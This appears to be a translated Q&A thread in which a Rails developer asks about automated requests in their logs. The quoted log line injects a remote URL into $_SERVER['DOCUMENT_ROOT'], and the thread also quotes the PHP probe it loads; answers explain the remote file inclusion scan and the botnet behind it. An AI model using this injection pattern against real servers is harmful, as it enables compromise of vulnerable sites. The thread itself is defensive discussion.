Ultimamente, tenho encontrado muitos pedidos estranhos como esse no meu aplicativo:
Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET]
Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}}
ActionController::RoutingError (No route matches "/browse/brand/nike ///" with {:method=>:get}):
Parece que ele é automatizado, pois recebo muitos deles e percebo os parâmetros estranhos que eles estão tentando enviar:
_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???
Isso é algo malicioso e, em caso afirmativo, o que devo fazer sobre isso?
Se você abrir o documento referenciado no servidor coreano (eu provavelmente não deveria ter, mas eu fiz;) ele diz:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Pesquisando no 'net, parece que esta é uma façanha para o Joomla, Wordpress e / ou Firestats (sites diferentes mencionam alvos diferentes). Se você estiver executando algum destes, certifique-se de atualizar para a versão mais recente.
Isso não é um exploit: ele apenas tenta encontrar servidores vulneráveis que permitem substituir a variável $_SERVER['DOCUMENT_ROOT'] PHP.
Funciona assim: se o servidor estiver vulnerável, "FeeLCoMz" será impresso na página. Ele é detectado pelo script que enviou a solicitação e o site é adicionado a um banco de dados de servidores, que em breve se tornará um membro orgulhoso da botnet:)
O código Sean Earp colado acima é apenas um código de teste para ver se o seu sistema está vulnerável ou não. Então, se o seu sistema está vulnerável, o ataque principal vem. Seu sistema está sob o controle do invasor. O invasor torna seu sistema um servidor de IRC para seus amigos e compartilha todos os seus arquivos com outras pessoas. ou usa seu sistema como vítima para atacar outros números IP. ou exclui tudo o que você tem, ou tira suas senhas, ou falsifica seus dados cliensts etc. Há um artigo em Anatomia e dissecação de Ataques de Injeção Remota de Código Exemplos de alguns códigos de ataque reais são dados lá.
Eu também segui por um período para descobrir quem é FeelComz. O que eu encontrei é um pobre garoto indonésio jogando dia & noite nos sites do irc. Ele tem uma página pessoal em um site indonésio chamado Friendster. Parece que ele está agradecendo pelas ajudas que você fez ao país depois do tsunami.